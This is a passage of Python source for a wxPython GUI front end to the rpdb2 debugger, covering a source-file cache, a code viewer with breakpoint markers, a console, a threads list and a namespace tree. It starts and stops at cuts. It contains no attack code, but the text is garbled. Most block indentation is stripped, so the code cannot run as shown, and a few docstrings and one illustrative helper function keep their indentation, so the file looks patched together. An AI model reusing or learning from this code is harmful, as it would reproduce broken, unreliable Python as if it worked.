ne = wx.NavigationKeyEvent()
ne.SetDirection(forward)
ne.SetCurrentFocus(self)
ne.SetEventObject(self)
self.GetParent().GetEventHandler().ProcessEvent(ne)
event.Skip()
return
event.Skip()
class CSourceManager:
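    """
    Cache of debuggee source files. load_source() fetches a file
    asynchronously through the session manager and stores it as
    (timestamp, text); a timestamp of 0 marks a good copy, while error
    placeholders carry the fetch time and are served only for
    BAD_FILE_WARNING_TIMEOUT_SEC seconds before get_source() raises
    KeyError again to force a reload.
    """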
def __init__(self, job_manager, session_manager):
self.m_job_manager = job_manager
self.m_session_manager = session_manager
self.m_async_sm = CAsyncSessionManager(session_manager, self.m_job_manager)
self.m_files = {}
self.m_lock = threading.RLock()
def _clear(self):
self.m_files = {}
def mark_files_dirty(self):
for k, v in list(self.m_files.items()):
self.m_files[k] = (DIRTY_CACHE, rpdb2.as_string(''))
def is_in_files(self, filename):
for k in list(self.m_files.keys()):
if filename in k:
return True
return False
def get_source(self, filename):
for k, v in list(self.m_files.items()):
if not filename in k:
continue
(_time, source) = v
if _time == 0:
return (k, source)
t = time.time()
if t - _time < BAD_FILE_WARNING_TIMEOUT_SEC:
return (k, source)
#del self.m_files[k]
raise KeyError
raise KeyError
def load_source(self, filename, callback, args, fComplain):
f = lambda r, exc_info: self.callback_load_source(r, exc_info, filename, callback, args, fComplain)
self.m_async_sm.with_callback(f, ftrace = True).get_source_file(filename, -1, -1)
def callback_load_source(self, r, exc_info, filename, callback, args, fComplain):
(t, v, tb) = exc_info
if self.m_session_manager.get_state() == rpdb2.STATE_DETACHED:
return
if t == None:
_time = 0
_filename = r[rpdb2.DICT_KEY_FILENAME]
source_lines = r[rpdb2.DICT_KEY_LINES]
            source = ''.join(source_lines)
if not g_fUnicode:
source = rpdb2.as_string(source, wx.GetDefaultPyEncoding())
elif t == rpdb2.NotPythonSource and fComplain:
dlg = wx.MessageDialog(None, MSG_ERROR_FILE_NOT_PYTHON % (filename, ), MSG_WARNING_TITLE, wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
return
elif t in (IOError, socket.error, rpdb2.NotPythonSource) or isinstance(v, rpdb2.CConnectionException):
if fComplain:
dlg = wx.MessageDialog(None, STR_FILE_LOAD_ERROR % (filename, ), MSG_WARNING_TITLE, wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
return
if t == IOError and rpdb2.BLENDER_SOURCE_NOT_AVAILABLE in v.args and not self.is_in_files(filename):
dlg = wx.MessageDialog(None, STR_BLENDER_SOURCE_WARNING, MSG_WARNING_TITLE, wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
_time = time.time()
_filename = filename
source = STR_FILE_LOAD_ERROR2 % (filename, )
if not g_fUnicode:
source = rpdb2.as_string(source, wx.GetDefaultPyEncoding())
else:
rpdb2.print_debug('get_source_file() returned the following error: %s' % repr(t))
_time = time.time()
_filename = filename
source = STR_FILE_LOAD_ERROR2 % (filename, )
if not g_fUnicode:
source = rpdb2.as_string(source, wx.GetDefaultPyEncoding())
try:
self.m_lock.acquire()
fNotify = not self.is_in_files(_filename)
self.m_files[_filename] = (_time, source)
finally:
self.m_lock.release()
_args = (_filename, ) + args + (fNotify, )
callback(*_args)
class CCodeViewer(wx.Panel, CJobs, CCaptionManager):
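    """
    Source pane: a caption plus a CStyledViewer. Tracks the position
    reported by the debugger, breakpoint markers, per-file cursor positions
    and a most-recently-used file history for quick switching between
    recently viewed files.
    """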
def __init__(self, *args, **kwargs):
self.m_session_manager = kwargs.pop('session_manager')
self.m_notify_filename = kwargs.pop('notify_filename', None)
self.m_source_manager = kwargs.pop('source_manager')
wx.Panel.__init__(self, *args, **kwargs)
CJobs.__init__(self)
self.init_jobs()
self.m_async_sm = CAsyncSessionManager(self.m_session_manager, self)
self.m_history = []
self.m_history_index = 0
self.m_fSwitch = False
self.m_swiched_original = None
self.m_files = {}
self.m_cur_filename = None
self.m_pos_filename = None
self.m_pos_lineno = None
self.m_pos_event = None
self.m_breakpoint_lines = {}
self.m_request_number = 0
self.m_last_position_time = 0
self.m_event2Marker = {'running': MARKER_RUNNING, 'call': MARKER_CALL, 'line': MARKER_LINE, 'return': MARKER_RETURN, 'exception': MARKER_EXCEPTION}
_sizerv = wx.BoxSizer(wx.VERTICAL)
sizerv = wx.BoxSizer(wx.VERTICAL)
_sizerv.Add(sizerv, 1, wx.EXPAND | wx.ALL, 3)
self.m_caption = CCaption(self, label = CAPTION_SOURCE)
sizerv.Add(self.m_caption, 0, wx.EXPAND | wx.ALL, 0)
self.m_viewer = CStyledViewer(self, style = wx.TAB_TRAVERSAL, margin_command = self.on_margin_clicked)
self.bind_caption(self.m_viewer)
sizerv.Add(self.m_viewer, 1, wx.EXPAND | wx.ALL, 0)
self.SetSizer(_sizerv)
_sizerv.Fit(self)
self.m_sizerv = sizerv
self.Bind(wx.EVT_KEY_DOWN, self.OnKeyPressed)
self.Bind(wx.EVT_KEY_UP, self.OnKeyReleased)
self.Bind(wx.EVT_WINDOW_DESTROY, self.OnDestroyWindow)
def OnDestroyWindow(self, event):
self.shutdown_jobs()
def set_cursor(self, id):
self.m_viewer.SetSTCCursor([stc.STC_CURSORNORMAL, stc.STC_CURSORWAIT][id == wx.CURSOR_WAIT])
def on_margin_clicked(self, event):
lineno = self.m_viewer.LineFromPosition(event.GetPosition()) + 1
self.__toggle_breakpoint(lineno)
event.Skip()
def get_file_lineno(self):
lineno = self.m_viewer.GetCurrentLine() + 1
return (self.m_cur_filename, lineno)
def toggle_breakpoint(self):
lineno = self.m_viewer.GetCurrentLine() + 1
self.__toggle_breakpoint(lineno)
def __toggle_breakpoint(self, lineno):
try:
bpl = self.m_session_manager.get_breakpoints()
except rpdb2.NotAttached:
return
id = self.m_breakpoint_lines.get(lineno, None)
if id is not None:
bp = bpl.get(id, None)
if (id is None) or (bp is None):
self.m_async_sm.set_breakpoint(self.m_cur_filename, '', lineno, True, '')
return
self.m_async_sm.delete_breakpoint([id], False)
def _disable(self):
self.m_viewer.Disable()
def _enable(self):
self.m_viewer.Enable()
def get_history(self, fBack):
self.m_history_index = (self.m_history_index + [-1, 1][fBack]) % len(self.m_history)
return self.m_history[self.m_history_index]
def set_history(self, value):
if value in self.m_history:
self.m_history.remove(value)
self.m_history.insert(0, value)
self.m_history = self.m_history[:50]
self.m_history_index = 0
def OnKeyPressed(self, event):
if len(self.m_history) < 2:
return
if self.m_fSwitch == False:
self.m_fSwitch = True
self.m_swiched_original = self.m_cur_filename
value = self.get_history(event.ShiftDown())
self.set_file(value, fNoHistory = True)
def OnKeyReleased(self, event):
if self.m_fSwitch == False:
return
if self.m_swiched_original == self.m_cur_filename:
return
self.set_history(self.m_cur_filename)
def _clear(self):
self.m_history = []
self.m_history_index = 0
self.m_fSwitch = False
self.m_swiched_original = None
self.m_files = {}
self.m_cur_filename = None
self.m_pos_filename = None
self.m_pos_lineno = None
self.m_pos_event = None
self.m_viewer._clear()
def __notify_filename(self, filename, fNew):
if self.m_notify_filename is None:
return
if fNew:
def command(event, filename = filename):
self.set_file(filename)
else:
command = None
self.m_notify_filename(filename, command)
def refresh(self):
if self.m_cur_filename == None:
return
filename = self.m_cur_filename
self.m_files[self.m_cur_filename] = self.m_viewer.GetCurrentLine() + 1
self.m_cur_filename = None
self.set_file(filename)
def set_file(self, filename, fNoHistory = False, request_number = 0, fNotify = False, fComplain = False):
if fNotify:
self.__notify_filename(filename, fNew = True)
if request_number == 0:
self.m_request_number += 1
request_number = self.m_request_number
elif request_number < self.m_request_number:
return
if self.m_cur_filename == filename:
return
try:
(_filename, source) = self.m_source_manager.get_source(filename)
except KeyError:
self.m_source_manager.load_source(filename, self.set_file, (fNoHistory, request_number,), fComplain)
return
if self.m_cur_filename == _filename:
return
self.__notify_filename(filename, fNew = False)
if self.m_cur_filename is not None:
self.m_files[self.m_cur_filename] = self.m_viewer.GetCurrentLine() + 1
lineno = self.m_files.get(_filename, 1)
self.m_viewer.load_source(source)
self.m_viewer.EnsureVisibleEnforcePolicy(lineno - 1)
self.m_viewer.GotoLine(lineno - 1)
displayed_filename = _filename
if not g_fUnicode:
displayed_filename = rpdb2.as_string(displayed_filename, wx.GetDefaultPyEncoding())
label = CAPTION_SOURCE + ' ' + rpdb2.clip_filename(displayed_filename)
self.m_caption.m_static_text.SetLabel(label)
self.m_sizerv.Layout()
self.m_cur_filename = _filename
self.set_markers()
if fNoHistory == False:
self.set_history(self.m_cur_filename)
def set_position(self, filename, lineno, event, request_number = 0, fNotify = False):
if fNotify:
self.__notify_filename(filename, fNew = True)
if request_number == 0:
self.m_request_number += 1
request_number = self.m_request_number
elif request_number < self.m_request_number:
return
if self.m_cur_filename != filename:
try:
(_filename, source) = self.m_source_manager.get_source(filename)
except KeyError:
self.m_source_manager.load_source(filename, self.set_position, (lineno, event, request_number), fComplain = False)
return
self.__notify_filename(filename, fNew = False)
if self.m_cur_filename is not None:
self.m_files[self.m_cur_filename] = self.m_viewer.GetCurrentLine() + 1
self.m_viewer.load_source(source)
self.m_viewer.EnsureVisibleEnforcePolicy(lineno - 1)
self.m_viewer.GotoLine(lineno - 1)
displayed_filename = filename
if not g_fUnicode:
displayed_filename = rpdb2.as_string(displayed_filename, wx.GetDefaultPyEncoding())
label = CAPTION_SOURCE + ' ' + rpdb2.clip_filename(displayed_filename)
self.m_caption.m_static_text.SetLabel(label)
self.m_sizerv.Layout()
self.m_cur_filename = filename
self.m_pos_filename = filename
self.m_pos_lineno = lineno
self.m_pos_event = event
self.set_markers()
self.set_history(self.m_cur_filename)
self.m_last_position_time = time.time()
def update_bp(self, event):
if self.m_pos_filename is None:
return
fposition_timeout = time.time() - self.m_last_position_time > POSITION_TIMEOUT
if event.m_action == rpdb2.CEventBreakpoint.SET and fposition_timeout:
if self.m_cur_filename == event.m_bp.m_filename:
lineno = event.m_bp.m_lineno
self.m_viewer.EnsureVisibleEnforcePolicy(lineno - 1)
self.m_viewer.GotoLine(lineno - 1)
self.set_markers()
def set_markers(self):
for marker in MARKER_LIST:
self.m_viewer.MarkerDeleteAll(marker)
if self.m_pos_filename == self.m_cur_filename:
self.m_viewer.MarkerAdd(self.m_pos_lineno - 1, self.m_event2Marker[self.m_pos_event])
f_current_line = False
try:
bpl = self.m_session_manager.get_breakpoints()
except rpdb2.NotAttached:
return
self.m_breakpoint_lines = {}
for bp in bpl.values():
if bp.m_filename != self.m_cur_filename:
continue
self.m_breakpoint_lines[bp.m_lineno] = bp.m_id
if (self.m_pos_filename == self.m_cur_filename) and (bp.m_lineno == self.m_pos_lineno) and bp.m_fEnabled:
self.m_viewer.MarkerAdd(self.m_pos_lineno - 1, MARKER_CURRENT_LINE_HIT)
f_current_line = True
else:
marker = [MARKER_BREAKPOINT_DISABLED, MARKER_BREAKPOINT_ENABLED][bp.m_fEnabled]
self.m_viewer.MarkerAdd(bp.m_lineno - 1, marker)
if (self.m_pos_filename == self.m_cur_filename) and not f_current_line:
self.m_viewer.MarkerAdd(self.m_pos_lineno - 1, MARKER_CURRENT_LINE)
class CConsole(wx.Panel, CCaptionManager):
def __init__(self, *args, **kwargs):
self.m_session_manager = kwargs.pop('session_manager')
self.m_exit_command = kwargs.pop('exit_command')
wx.Panel.__init__(self, *args, **kwargs)
#
# CConsole acts as stdin and stdout so it exposes the encoding property.
#
if not g_fUnicode:
self.encoding = wx.GetDefaultPyEncoding()
else:
self.encoding = 'utf-8'
self.m_fcompletions_warning = False
self.m_completions = None
self.m_history = ['']
self.m_history_index_up = 0
self.m_history_index_down = 0
self.m_history_index_errors = 0
self.m_console = rpdb2.CConsole(self.m_session_manager, stdin = self, stdout = self, fSplit = True)
self.m_queue = Queue.Queue()
_sizerv = wx.BoxSizer(wx.VERTICAL)
sizerv = wx.BoxSizer(wx.VERTICAL)
_sizerv.Add(sizerv, 1, wx.EXPAND | wx.ALL, 3)
self.m_caption = CCaption(self, label = CAPTION_CONSOLE)
sizerv.Add(self.m_caption, 0, wx.EXPAND | wx.ALL, 0)
self.m_console_out = wx.TextCtrl(self, style = wx.TAB_TRAVERSAL | wx.TE_MULTILINE | wx.HSCROLL | wx.VSCROLL)
self.m_console_out.Bind(wx.EVT_KEY_DOWN, self.OnConsoleOutKeyPressed)
self.bind_caption(self.m_console_out)
self.set_font(self.m_console_out)
sizerv.Add(self.m_console_out, 1, wx.EXPAND | wx.ALL, 0)
sizerh = wx.BoxSizer(wx.HORIZONTAL)
sizerv.Add(sizerh, 0, wx.EXPAND | wx.ALL, 0)
label = wx.StaticText(self, -1, LABEL_CONSOLE, style = wx.TAB_TRAVERSAL)
sizerh.Add(label, 0, wx.ALIGN_CENTRE | wx.ALL, 0)
self.m_console_in = wx.TextCtrl(self, style = wx.TE_PROCESS_ENTER)
self.bind_caption(self.m_console_in)
self.set_font(self.m_console_in)
self.m_console_in.SetFocus()
self.m_console_in.Bind(wx.EVT_CHAR, self.OnChar)
self.m_console_in.Bind(wx.EVT_TEXT_ENTER, self.OnSendText)
sizerh.Add(self.m_console_in, 1, wx.EXPAND | wx.ALL, 0)
self.SetSizer(_sizerv)
_sizerv.Fit(self)
def OnConsoleOutKeyPressed(self, event):
key_code = event.GetKeyCode()
if key_code != wx.WXK_TAB:
return
forward = not event.ShiftDown()
ne = wx.NavigationKeyEvent()
ne.SetDirection(forward)
ne.SetCurrentFocus(self.m_console_out)
ne.SetEventObject(self.m_console_out)
self.GetEventHandler().ProcessEvent(ne)
event.Skip()
def set_focus(self):
self.m_console_in.SetFocus()
def set_filename(self, filename):
self.m_console.set_filename(filename)
def set_font(self, ctrl):
font = ctrl.GetFont()
if wx.Platform == '__WXMSW__':
face = "Courier New"
point_size = 9
else:
face = "Courier"
point_size = font.GetPointSize()
new_font = wx.Font(pointSize = point_size, family = font.GetFamily(), style = font.GetStyle(), weight = font.GetWeight(), face = face)
ctrl.SetFont(new_font)
def start(self):
self.m_console.start()
self.m_console.printer(COMPLETIONS_NOTICE)
def stop(self):
self.m_queue.put('exit\n')
self.m_queue.put('exit\n')
self.m_console.join()
def write(self, _str):
if not g_fUnicode:
_str = rpdb2.as_string(_str, wx.GetDefaultPyEncoding())
else:
_str = rpdb2.as_unicode(_str, self.encoding)
sl = _str.split('\n')
_str = ''
for s in sl:
while True:
_str += '\n' + s[:81]
s = s[81:]
if len(s) == 0:
break
wx.CallAfter(self.m_console_out.write, _str[1:])
def flush(self):
pass
def readline(self):
_str = self.m_queue.get()
return _str
def OnChar(self, event):
key = event.GetKeyCode()
if self.m_fcompletions_warning:
self.m_fcompletions_warning = False
if key in [ord(c) for c in COMPLETIONS_WARNING_CONFIRM_CHARS]:
self.CompleteExpression(fForce = True)
return
if (key + ord('a') - 1) in [ord('n'), ord('N')] and event.ControlDown():
self.CompleteExpression()
event.Skip()
return
if key in [wx.WXK_UP, wx.WXK_DOWN]:
value = self.m_console_in.GetValue()
_value = self.get_history(key == wx.WXK_UP, value)
self.m_console_in.SetValue(_value)
self.m_console_in.SetInsertionPointEnd()
return
event.Skip()
def CompleteExpression(self, fForce = False):
v = self.m_console_in.GetValue()
ip = self.m_console_in.GetInsertionPoint()
ce = v[:ip]
completions = []
while True:
c = self.m_console.complete(ce, len(completions))
if c == None:
break
completions.append(c)
if completions == []:
return
d = calc_denominator(completions)
nv = d + v[ip:]
self.m_console_in.SetValue(nv)
self.m_console_in.SetInsertionPoint(len(d))
if len(completions) == 1:
return
if len(completions) > COMPLETIONS_WARNING_THRESHOLD and not fForce:
self.m_console_out.write(COMPLETIONS_WARNING % len(completions))
self.m_fcompletions_warning = True
return
if ce != '' and ce.split()[0] == 'launch':
#
# Go over launch completions and extract the basenames.
            # Add a trailing path separator '/' to directory-name completions.
#
_completions = []
for c in completions:
p = c.split()[-1]
dn, bn = os.path.split(p)
if bn == '':
bn = os.path.join(os.path.split(dn)[1], '')
_completions.append(bn)
completions = _completions
if ce != '' and ce.split()[0] in ['v', 'eval', 'x', 'exec']:
completions = [re.split('\W+', c)[-1] for c in completions]
if completions == self.m_completions:
return
self.m_completions = completions
out = ', '.join(completions)
lines = textwrap.wrap(out, 60)
text = '\n'.join(lines) + '\n'
self.m_console_out.write(CONSOLE_COMPLETIONS % text)
def OnSendText(self, event):
self.m_completions = None
value = self.m_console_in.GetValue()
self.set_history(value)
self.m_console_out.write(CONSOLE_PROMPT + value + '\n')
self.m_console_in.Clear()
if value in ['exit', 'EOF']:
self.m_exit_command()
return
value = rpdb2.as_unicode(value, wx.GetDefaultPyEncoding())
self.m_queue.put(value + '\n')
def get_history(self, fBack, value = None):
if fBack:
index = self.m_history_index_up
else:
index = self.m_history_index_down
if (value is not None) and (value != self.m_history[index]):
self.m_history[0] = value
self.m_history_index_up = 0
self.m_history_index_errors = 0
try:
if fBack:
self.m_history_index_up = self.find_next_up()
self.m_history_index_down = self.m_history_index_up
else:
self.m_history_index_down = self.find_next_down()
self.m_history_index_up = self.m_history_index_down
except KeyError:
if self.m_history_index_errors == 3:
self.m_history_index_errors += 1
return self.get_history(fBack, value)
return self.m_history[self.m_history_index_up]
def find_next_up(self):
if self.m_history_index_up >= len(self.m_history) - 1:
raise KeyError
if self.m_history_index_errors >= 3:
prefix = ''
else:
prefix = self.m_history[0]
index = self.m_history_index_up
current = self.m_history[index]
while True:
index += 1
if index >= len(self.m_history):
self.m_history_index_errors += 1
raise KeyError
next = self.m_history[index]
if next != current and next.startswith(prefix):
break
if self.m_history_index_errors < 3:
self.m_history_index_errors = 0
return index
def find_next_down(self):
if self.m_history_index_errors < 3:
self.m_history_index_errors = 0
if self.m_history_index_errors >= 3:
prefix = ''
else:
prefix = self.m_history[0]
index = self.m_history_index_down
current = self.m_history[index]
while True:
index -= 1
if index < 0:
raise KeyError
next = self.m_history[index]
if next != current and next.startswith(prefix):
return index
def set_history(self, value):
self.m_history[0] = ''
self.m_history_index_up = 0
if value != '' and (len(self.m_history) <= 1 or value != self.m_history[1]):
self.m_history.insert(1, value)
self.m_history = self.m_history[:50]
if self.m_history_index_down != 0:
self.m_history_index_down = min(self.m_history_index_down + 1, len(self.m_history) - 1)
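#
# The history navigation above (get_history / find_next_up / find_next_down)
# walks the command history for the nearest entry that differs from the
# current one and still starts with the prefix typed so far; after a few
# failed attempts the prefix filter is dropped.  The helper below is only an
# illustrative sketch of that search and is not used by the GUI classes here.
#
def _history_prefix_search_sketch(history, index, prefix):
    """Return the index of the previous distinct entry matching prefix.

    Sketch only: history[0] holds the line currently being edited and older
    entries follow it.  Raises KeyError when nothing further back matches.
    """
    current = history[index]
    i = index
    while True:
        i += 1
        if i >= len(history):
            raise KeyError
        candidate = history[i]
        if candidate != current and candidate.startswith(prefix):
            return i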
class CThreadsViewer(wx.Panel, CCaptionManager):
def __init__(self, *args, **kwargs):
self.m_select_command = kwargs.pop('select_command', None)
wx.Panel.__init__(self, *args, **kwargs)
self.m_suppress_recursion = 0
_sizerv = wx.BoxSizer(wx.VERTICAL)
sizerv = wx.BoxSizer(wx.VERTICAL)
_sizerv.Add(sizerv, 1, wx.EXPAND | wx.ALL, 3)
self.m_caption = CCaption(self, label = CAPTION_THREADS)
sizerv.Add(self.m_caption, 0, wx.EXPAND | wx.ALL, 0)
self.m_threads = CListCtrl(parent = self, style = wx.LC_REPORT | wx.LC_SINGLE_SEL)
self.bind_caption(self.m_threads)
self.m_threads.InsertColumn(0, HLIST_HEADER_TID + ' ')
self.m_threads.InsertColumn(1, HLIST_HEADER_NAME)
self.m_threads.InsertColumn(2, HLIST_HEADER_STATE)
sizerv.Add(self.m_threads, 1, wx.EXPAND | wx.ALL, 0)
if self.m_select_command:
self.m_threads.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnThreadSelected)
self.SetSizer(_sizerv)
_sizerv.Fit(self)
def set_cursor(self, id):
cursor = wx.StockCursor(id)
self.SetCursor(cursor)
self.m_threads.SetCursor(cursor)
def _clear(self):
self.m_threads.DeleteAllItems()
self.m_threads.Disable()
def _disable(self):
self.m_threads.Disable()
def _enable(self):
self.m_threads.Enable()
def is_selected(self, index):
return self.m_threads.IsSelected(index)
def update_thread(self, thread_id, thread_name, fBroken):
assert(rpdb2.is_unicode(thread_name))
index = self.m_threads.FindItemData(-1, thread_id)
if index < 0:
return -1
if not g_fUnicode:
thread_name = rpdb2.as_string(thread_name, wx.GetDefaultPyEncoding())
self.m_threads.SetStringItem(index, 1, thread_name)
self.m_threads.SetStringItem(index, 2, [rpdb2.STATE_RUNNING, rpdb2.STR_STATE_BROKEN][fBroken])
return index
def update_threads_list(self, current_thread, threads_list):
if self.m_suppress_recursion > 0:
self.m_suppress_recursion -= 1
return
self.m_threads.DeleteAllItems()
j = None
for i, s in enumerate(threads_list):
tid = s[rpdb2.DICT_KEY_TID]
name = s[rpdb2.DICT_KEY_NAME]
if not g_fUnicode:
name = rpdb2.as_string(name, wx.GetDefaultPyEncoding())
fBroken = s[rpdb2.DICT_KEY_BROKEN]
index = self.m_threads.InsertStringItem(sys.maxint, repr(tid))
self.m_threads.SetStringItem(index, 1, name)
self.m_threads.SetStringItem(index, 2, [rpdb2.STATE_RUNNING, rpdb2.STR_STATE_BROKEN][fBroken])
self.m_threads.SetItemData(index, tid)
if tid == current_thread:
j = i
self.m_threads.set_columns_width()
if j is not None:
self.m_suppress_recursion += 1
self.m_threads.Select(j)
def OnThreadSelected(self, event):
if self.m_suppress_recursion == 0:
self.m_suppress_recursion += 1
index = event.m_itemIndex
tid = self.m_threads.GetItemData(index)
self.m_select_command(tid)
else:
self.m_suppress_recursion -= 1
event.Skip()
class CNamespacePanel(wx.Panel, CJobs):
def __init__(self, *args, **kwargs):
self.m_session_manager = kwargs.pop('session_manager')
wx.Panel.__init__(self, *args, **kwargs)
CJobs.__init__(self)
self.init_jobs()
self.m_async_sm = CAsyncSessionManager(self.m_session_manager, self)
self.m_lock = threading.RLock()
self.m_jobs = []
self.m_n_workers = 0
self.m_filter_level = 0
self.m_key = None
sizerv = wx.BoxSizer(wx.VERTICAL)
self.m_tree = wx.gizmos.TreeListCtrl(self, -1, style = wx.TR_HIDE_ROOT | wx.TR_DEFAULT_STYLE | wx.TR_FULL_ROW_HIGHLIGHT | wx.NO_BORDER)
self.m_tree.AddColumn(TLC_HEADER_NAME)
self.m_tree.AddColumn(TLC_HEADER_TYPE)
self.m_tree.AddColumn(TLC_HEADER_REPR)
self.m_tree.SetColumnWidth(2, 800)
self.m_tree.SetMainColumn(0)
self.m_tree.SetLineSpacing(0)
self.m_tree.Bind(wx.EVT_TREE_ITEM_EXPANDING, self.OnItemExpanding)
self.m_tree.Bind(wx.EVT_TREE_ITEM_COLLAPSING, self.OnItemCollapsing)
self.m_tree.Bind(wx.EVT_TREE_ITEM_ACTIVATED, self.OnItemActivated)
try:
self.m_tree.Bind(wx.EVT_TREE_ITEM_GETTOOLTIP, self.OnItemToolTip)
except:
pass
self.Bind(wx.EVT_WINDOW_DESTROY, self.OnDestroyWindow)
sizerv.Add(self.m_tree, flag = wx.GROW, proportion = 1)
self.SetSizer(sizerv)
sizerv.Fit(self)
def OnDestroyWindow(self, event):
self.shutdown_jobs()
def _clear(self):
self.m_tree.DeleteAllItems()
def set_filter(self, filter_level):
self.m_filter_level = filter_level
def bind_caption(self, caption_manager):
w = self.m_tree.GetMainWindow()
caption_manager.bind_caption(w)
def OnItemActivated(self, event):
item = event.GetItem()
(expr, is_valid) = self.m_tree.GetPyData(item)
if expr in [STR_NAMESPACE_LOADING, STR_NAMESPACE_DEADLOCK, rpdb2.STR_MAX_NAMESPACE_WARNING_TITLE]:
return
if is_valid:
default_value = self.m_tree.GetItemText(item, 2)[1:]
else:
default_value = ''
expr_dialog = CExpressionDialog(self, default_value)
pos = self.GetPositionTuple()
expr_dialog.SetPosition((pos[0] + 50, pos[1] + 50))
r = expr_dialog.ShowModal()
if r != wx.ID_OK:
expr_dialog.Destroy()
return
_expr = expr_dialog.get_expression()
expr_dialog.Destroy()
_suite = "%s = %s" % (expr, _expr)
self.m_async_sm.with_callback(self.callback_execute).execute(_suite)
def callback_execute(self, r, exc_info):
(t, v, tb) = exc_info
if t != None:
            rpdb2.print_exception(t, v, tb)
return
(warning, error) = r
if error != '':
dlg = wx.MessageDialog(self, error, MSG_ERROR_TITLE, wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
if not warning in g_ignored_warnings:
dlg = wx.MessageDialog(self, MSG_WARNING_TEMPLATE % (warning, ), MSG_WARNING_TITLE, wx.OK | wx.CANCEL | wx.YES_DEFAULT | wx.ICON_WARNING)
res = dlg.ShowModal()
dlg.Destroy()
if res == wx.ID_CANCEL:
g_ignored_warnings[warning] = True
def OnItemToolTip(self, event):
item = event.GetItem()
tt = self.m_tree.GetItemText(item, 2)[1:]
event.SetToolTip(tt)
def OnItemCollapsing(self, event):
item = event.GetItem()
event.Skip()
def GetChildrenCount(self, item):
n = self.m_tree.GetChildrenCount(item)
if n != 1:
return n
child = self.get_children(item)[0]
(expr, is_valid) = self.m_tree.GetPyData(child)
if expr in [STR_NAMESPACE_LOADING, STR_NAMESPACE_DEADLOCK]:
return 0
return 1
def expand_item(self, item, _map, froot = False, fskip_expansion_check = False):
if not self.m_tree.ItemHasChildren(item):
return
if not froot and not fskip_expansion_check and self.m_tree.IsExpanded(item):
return
if self.GetChildrenCount(item) > 0:
return
(expr, is_valid) = self.m_tree.GetPyData(item)
l = [e for e in _map if e.get(rpdb2.DICT_KEY_EXPR, None) == expr]
if l == []:
return None
_r = l[0]
if _r is None:
return
if rpdb2.DICT_KEY_ERROR in _r:
return
if _r[rpdb2.DICT_KEY_N_SUBNODES] == 0:
self.m_tree.SetItemHasChildren(item, False)
return
#
# Create a list of the subitems.
# The list is indexed by name or directory key.
# In case of a list, no sorting is needed.
#
snl = _r[rpdb2.DICT_KEY_SUBNODES]
for r in snl:
if g_fUnicode:
_name = r[rpdb2.DICT_KEY_NAME]
_type = r[rpdb2.DICT_KEY_TYPE]
_repr = r[rpdb2.DICT_KEY_REPR]
else:
_name = rpdb2.as_string(r[rpdb2.DICT_KEY_NAME], wx.GetDefaultPyEncoding())
_type = rpdb2.as_string(r[rpdb2.DICT_KEY_TYPE], wx.GetDefaultPyEncoding())
_repr = rpdb2.as_string(r[rpdb2.DICT_KEY_REPR], wx.GetDefaultPyEncoding())
            indentation = ''
            #indentation = ['', ' '][os.name == rpdb2.POSIX and r[rpdb2.DICT_KEY_N_SUBNODES] == 0]
            child = self.m_tree.AppendItem(item, indentation + _name)
self.m_tree.SetItemText(child, ' ' + _repr, 2)
self.m_tree.SetItemText(child, ' ' + _type, 1)
self.m_tree.SetItemPyData(child, (r[rpdb2.DICT_KEY_EXPR], r[rpdb2.DICT_KEY_IS_VALID]))
self.m_tree.SetItemHasChildren(child, (r[rpdb2.DICT_KEY_N_SUBNODES] > 0))
self.m_tree.Expand(item)
def OnItemExpanding(self, event):
item = event.GetItem()
if not self.m_tree.ItemHasChildren(item):
event.Skip()
return
if self.GetChildrenCount(item) > 0:
event.Skip()
            self.m_tree.Refresh()
return
self.m_tree.DeleteChildren(item)
child = self.m_tree.AppendItem(item, STR_NAMESPACE_LOADING)
self.m_tree.SetItemText(child, ' ' + STR_NAMESPACE_LOADING, 2)
self.m_tree.SetItemText(child, ' ' + STR_NAMESPACE_LOADING, 1)
self.m_tree.SetItemPyData(child, (STR_NAMESPACE_LOADING, False))
(expr, is_valid) = self.m_tree.GetPyData(item)
f = lambda r, exc_info: self.callback_ns(r, exc_info, expr)
self.m_async_sm.with_callback(f).get_namespace([(expr, True)], self.m_filter_level)
event.Skip()
def callback_ns(self, r, exc_info, expr):
(t, v, tb) = exc_info
item = self.find_item(expr)
if item == None:
return
#
# When expanding a tree item with arrow-keys on wxPython 2.6, the
# temporary "loading" child is automatically selected. After
# replacement with real children we need to reselect the first child.
#
cl = self.get_children(item)
freselect_child = len(cl) != 0 and cl[0] == self.m_tree.GetSelection()
self.m_tree.DeleteChildren(item)
if t != None or r is None or len(r) == 0:
child = self.m_tree.AppendItem(item, STR_NAMESPACE_DEADLOCK)
self.m_tree.SetItemText(child, ' ' + STR_NAMESPACE_DEADLOCK, 2)
self.m_tree.SetItemText(child, ' ' + STR_NAMESPACE_DEADLOCK, 1)
self.m_tree.SetItemPyData(child, (STR_NAMESPACE_DEADLOCK, False))
self.m_tree.Expand(item)
if freselect_child:
self.m_tree.SelectItem(child)
return
self.expand_item(item, r, False, True)
if freselect_child:
cl = self.get_children(item)
self.m_tree.SelectItem(cl[0])
self.m_tree.Refresh()
def find_item(self, expr):
item = self.m_tree.GetRootItem()
while item:
(expr2, is_valid) = self.m_tree.GetPyData(item)
if expr2 == expr:
return item
item = self.m_tree.GetNext(item)
return None
def get_children(self, item):
(child, cookie) = self.m_tree.GetFirstChild(item)
cl = []
while child and child.IsOk():
cl.append(child)
(child, cookie) = self.m_tree.GetNextChild(item, cookie)
return cl
def get_expression_list(self):
if self.m_tree.GetCount() == 0:
return None
item = self.m_tree.GetRootItem()
s = [item]
el = []
while len(s) > 0:
item = s.pop(0)
(expr, is_valid) = self.m_tree.GetPyData(item)
fExpand = self.m_tree.IsExpanded(item) and self.GetChildrenCount(item) > 0
if not fExpand:
continue
el.append((expr, True))
items = self.get_children(item)
s = items + s
return el
def update_namespace(self, key, el):
old_key = self.m_key
old_el = self.get_expression_list()
if key == old_key:
el = old_el
self.m_key = key
if el is None:
el = [(self.get_root_expr(), True)]
self.post(el, self.m_filter_level)
return (old_key, old_el)
def post(self, el, filter_level):
self.m_jobs.insert(0, (el, filter_level))
if self.m_n_workers == 0:
self.job_post(self.job_update_namespace, ())
def job_update_namespace(self):
while len(self.m_jobs) > 0:
self.m_lock.acquire()
self.m_n_workers += 1
self.m_lock.release()
try:
